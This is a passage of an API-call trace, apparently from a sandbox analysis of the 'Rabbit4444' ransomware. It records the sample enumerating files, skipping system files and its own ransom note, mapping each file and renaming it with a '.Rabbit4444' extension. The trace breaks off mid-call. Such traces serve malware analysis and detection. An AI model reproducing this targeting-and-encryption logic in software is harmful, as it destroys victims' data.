lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_isrotationlocked.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.278] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27605624, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x27605624, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", cAlternateFileName="AAF454~1.SET")) returned 1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2=".") returned 1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2="..") returned 1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2="windows") returned -1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2="boot") returned -1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.278] lstrcmpiW (lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.278] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms") returned="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms" [0057.278] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_MainMonitor.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.279] lstrlenW (lpString="AAA_SystemSettings_Display_MainMonitor.settingcontent-ms") returned 56 [0057.279] lstrlenW (lpString="Rabbit4444") returned 10 [0057.279] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.279] lstrlenW (lpString=".dll") returned 4 [0057.279] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.279] lstrlenW (lpString=".lnk") returned 4 [0057.279] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.279] lstrlenW (lpString=".ini") returned 4 [0057.279] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.279] lstrlenW (lpString=".sys") returned 4 [0057.279] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.279] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_MainMonitor.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_mainmonitor.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.279] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.279] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14859009917) returned 1 [0057.279] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1237) returned 1 [0057.279] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.279] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0057.280] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.280] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.281] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.281] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.281] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.281] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0057.281] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0057.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.282] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14859257124) returned 1 [0057.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0057.282] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.282] CloseHandle (hObject=0x298) returned 1 [0057.282] CloseHandle (hObject=0x278) returned 1 [0057.282] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_MainMonitor.settingcontent-ms.Rabbit4444") returned 184 [0057.282] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_MainMonitor.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_mainmonitor.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_MainMonitor.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_mainmonitor.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.283] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27841919, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x27841919, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233c02ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Display_Monitors.settingcontent-ms", cAlternateFileName="AA5C91~1.SET")) returned 1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2=".") returned 1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2="..") returned 1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2="windows") returned -1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2="boot") returned -1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.283] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.284] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Display_Monitors.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Display_Monitors.settingcontent-ms") returned="AAA_SystemSettings_Display_Monitors.settingcontent-ms" [0057.284] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Monitors.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.284] lstrlenW (lpString="AAA_SystemSettings_Display_Monitors.settingcontent-ms") returned 53 [0057.284] lstrlenW (lpString="Rabbit4444") returned 10 [0057.284] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.284] lstrlenW (lpString=".dll") returned 4 [0057.284] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.284] lstrlenW (lpString=".lnk") returned 4 [0057.284] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.284] lstrlenW (lpString=".ini") returned 4 [0057.284] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.284] lstrlenW (lpString=".sys") returned 4 [0057.284] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Monitors.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_monitors.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.284] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.284] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14859511738) returned 1 [0057.284] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1222) returned 1 [0057.284] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0057.285] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0057.285] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.286] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.287] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.287] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14859776813) returned 1 [0057.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0057.287] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0057.287] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.287] CloseHandle (hObject=0x298) returned 1 [0057.287] CloseHandle (hObject=0x278) returned 1 [0057.287] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Monitors.settingcontent-ms.Rabbit4444") returned 181 [0057.287] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Monitors.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_monitors.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Monitors.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_monitors.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.288] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27972bf0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x27972bf0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Display_Orientation.settingcontent-ms", cAlternateFileName="AA4ABA~1.SET")) returned 1 [0057.288] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.288] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.288] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.288] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2=".") returned 1 [0057.288] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2="..") returned 1 [0057.288] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2="windows") returned -1 [0057.288] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.288] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.288] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2="boot") returned -1 [0057.288] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.289] lstrcmpiW (lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.289] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Display_Orientation.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Display_Orientation.settingcontent-ms") returned="AAA_SystemSettings_Display_Orientation.settingcontent-ms" [0057.289] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Orientation.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.289] lstrlenW (lpString="AAA_SystemSettings_Display_Orientation.settingcontent-ms") returned 56 [0057.289] lstrlenW (lpString="Rabbit4444") returned 10 [0057.289] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.289] lstrlenW (lpString=".dll") returned 4 [0057.289] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.289] lstrlenW (lpString=".lnk") returned 4 [0057.289] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.289] lstrlenW (lpString=".ini") returned 4 [0057.289] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.289] lstrlenW (lpString=".sys") returned 4 [0057.289] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.289] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Orientation.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_orientation.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.289] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.289] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14860019765) returned 1 [0057.289] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1237) returned 1 [0057.290] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0057.290] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.290] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.291] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.291] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.291] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.292] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.292] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.292] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.292] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14860257945) returned 1 [0057.292] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0057.292] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.292] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.292] CloseHandle (hObject=0x298) returned 1 [0057.292] CloseHandle (hObject=0x278) returned 1 [0057.292] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Orientation.settingcontent-ms.Rabbit4444") returned 184 [0057.292] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Orientation.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_orientation.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Display_Orientation.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_display_orientation.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.293] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28702233, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x28702233, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", cAlternateFileName="AAC6EE~1.SET")) returned 1 [0057.297] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.297] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.297] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.297] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2=".") returned 1 [0057.297] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2="..") returned 1 [0057.297] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2="windows") returned -1 [0057.297] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.297] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.298] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2="boot") returned -1 [0057.298] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.298] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.298] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms") returned="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms" [0057.298] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.298] lstrlenW (lpString="AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms") returned 71 [0057.298] lstrlenW (lpString="Rabbit4444") returned 10 [0057.298] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.298] lstrlenW (lpString=".dll") returned 4 [0057.298] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.298] lstrlenW (lpString=".lnk") returned 4 [0057.298] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.298] lstrlenW (lpString=".ini") returned 4 [0057.298] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.299] lstrlenW (lpString=".sys") returned 4 [0057.299] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.299] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_mouse_setbuttonconfiguration.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.299] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.299] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14860962761) returned 1 [0057.299] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1307) returned 1 [0057.299] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0057.299] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0057.299] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.302] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 